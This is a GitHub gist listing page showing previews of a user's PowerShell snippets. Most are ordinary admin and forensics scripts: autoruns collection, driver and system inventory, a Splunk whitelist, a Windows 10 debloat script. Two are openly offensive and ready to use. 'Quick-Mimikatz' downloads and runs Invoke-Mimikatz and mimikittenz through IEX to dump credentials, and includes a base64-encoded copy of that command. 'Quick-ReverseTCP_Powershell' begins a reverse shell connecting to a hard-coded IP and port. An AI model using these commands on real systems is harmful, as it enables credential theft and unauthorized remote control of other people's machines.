PolarBearGod
PolarBearGod
/ Get-AutoRuns.ps1
Last active
March 13, 2018 18:28
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $client=new-object System.Net.WebClient; | |
| $client.DownloadFile("https://live.sysinternals.com/autorunsc.exe","c:\windows\temp\autoruns.exe"); | |
| (New-Object -com Shell.Application).ShellExecute("powershell.exe", "-windowstyle hidden -Command c:\windows\temp\autoruns.exe -a * -c -h -s -t -nobanner > C:\windows\temp\$env:ComputerName-autoruns.csv"); | |
| sleep(100) |
PolarBearGod
/ Get-DriverInformation.ps1
Created
March 2, 2018 14:11
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Get-WmiObject Win32_PnPSignedDriver | select DeviceName, Description, DeviceID, DriverDate, DriverProviderName, FriendlyName, DriverVersion, IsSigned, Signer | export-csv "c:\Windows\Temp\$env:COMPUTERNAME-DriverInformation.csv" |
PolarBearGod
/ Quick-Mimikatz
Last active
August 28, 2020 14:10
— forked from gfoss/Quick-Mimikatz
Quick Mimikatz
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| *NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!* | |
| #mimikatz | |
| IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m | |
| #encoded-mimikatz | |
| powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQA= | |
| #mimikittenz | |
| IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Inv |
PolarBearGod
/ Quick-ReverseTCP_Powershell.ps1
Last active
March 7, 2018 02:49
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $socket = new-object System.Net.Sockets.TcpClient('192.168.117.145', 8181); | |
| if($socket -eq $null){exit 1} | |
| $stream = $socket.GetStream(); | |
| $writer = new-object System.IO.StreamWriter($stream); | |
| $buffer = new-object System.Byte[] 1024; | |
| $encoding = new-object System.Text.AsciiEncoding; | |
| do{ | |
| $writer.Write("> "); | |
| $writer.Flush(); | |
| $read = $null; |
PolarBearGod
/ Splunk__Whitelist.txt
Created
March 23, 2018 17:27
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| NOT IP_Address=10.0.0.0/8 | |
| NOT IP_Address=172.16.0.0/12 | |
| NOT IP_Address=192.168.0.0/16 | |
| NOT DNS_Hostname="*.google.com" | |
| NOT DNS_Hostname="*.google.ac" | |
| NOT DNS_Hostname="*.google.ad" | |
| NOT DNS_Hostname="*.google.ae" | |
| NOT DNS_Hostname="*.google.com.af" | |
| NOT DNS_Hostname="*.google.com.ag" | |
| NOT DNS_Hostname="*.google.com.ai" |
PolarBearGod
/ Script_Template.ps1
Created
June 28, 2018 16:24
— forked from 9to5IT/Script_Template.ps1
PowerShell: Script Template
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #requires -version 2 | |
| <# | |
| .SYNOPSIS | |
| <Overview of script> | |
| .DESCRIPTION | |
| <Brief description of script> | |
| .PARAMETER <Parameter_Name> | |
| <Brief description of parameter input required. Repeat this attribute if required> |
PolarBearGod
/ ZipFiles.ps1
Created
June 29, 2018 18:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function ZipFiles { | |
| <# | |
| .SYNOPSIS | |
| A function to zip or unzip files. | |
| .DESCRIPTION | |
| This function has 3 possible uses. | |
| 1) Zip a folder or files and save the zip to specified location. | |
| 2) Unzip a zip file to a specified folder. | |
| 3) Unzip a zip file and delete the original zip when complete. | |
PolarBearGod
/ reclaimWindows10.ps1
Created
July 3, 2018 19:04
— forked from alirobe/reclaimWindows10.ps1
This Windows 10 Setup Script turns off a bunch of unnecessary Windows 10 telemetery, bloatware, & privacy things. Not guaranteed to catch everything. Review and tweak before running. Reboot after running. Scripts for reversing are included and commented. Fork of https://github.com/Disassembler0/Win10-Initial-Setup-Script (different defaults). N.…
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ########## | |
| # Tweaked Win10 Initial Setup Script | |
| # Primary Author: Disassembler <disassembler@dasm.cz> | |
| # Modified by: alirobe <alirobe@alirobe.com> based on my personal preferences. | |
| # Version: 2.12.1, 2018-03-15 | |
| # Primary Author Source: https://github.com/Disassembler0/Win10-Initial-Setup-Script | |
| # Tweaked Source: https://gist.github.com/alirobe/7f3b34ad89a159e6daa1/ | |
| # Tweak difference: | |
| # | |
| # @alirobe's version is a subset focused on safely disabling telemetry, some 'smart' features and 3rd party bloat ... |
PolarBearGod
/ Get-ChromeExtensions.ps1
Last active
July 26, 2018 18:09
Found Script https://community.spiceworks.com/scripts/show/3911-get-chromeextensions-ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| param( | |
| [String]$OutputFolder = $null, | |
| [String]$ExtensionId = $null, | |
| [Switch]$Remove, | |
| [Switch]$WhatIf | |
| ) | |
| ##: Globals | |
| $retval = $false |
PolarBearGod
/ Get-SystemInfo.ps1
Last active
September 4, 2020 16:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Get-SystemInfo { | |
| param([Parameter(Mandatory = $true)] $ComputerName, [switch] $IgnorePing) | |
| $computer = $ComputerName | |
| $data = @{} | |
| $data.' ComputerName' = $computer | |
| $ping = Test-Connection -quiet -count 1 $computer | |
| $Ping = $(if ($ping) { 'Yes' }else { 'No' }) | |
| $ErrorActionPreference = 'SilentlyContinue' | |
| if ($ips = [System.Net.Dns]::GetHostAddresses($computer) | ForEach-Object { $_.IPAddressToString }) { $data.'IP Address(es) from DNS' = ($ips -join ', ') }else { $data.'IP Address from DNS' = 'Could not resolve' } | |
| $ErrorActionPreference = 'Continue' |
OlderNewer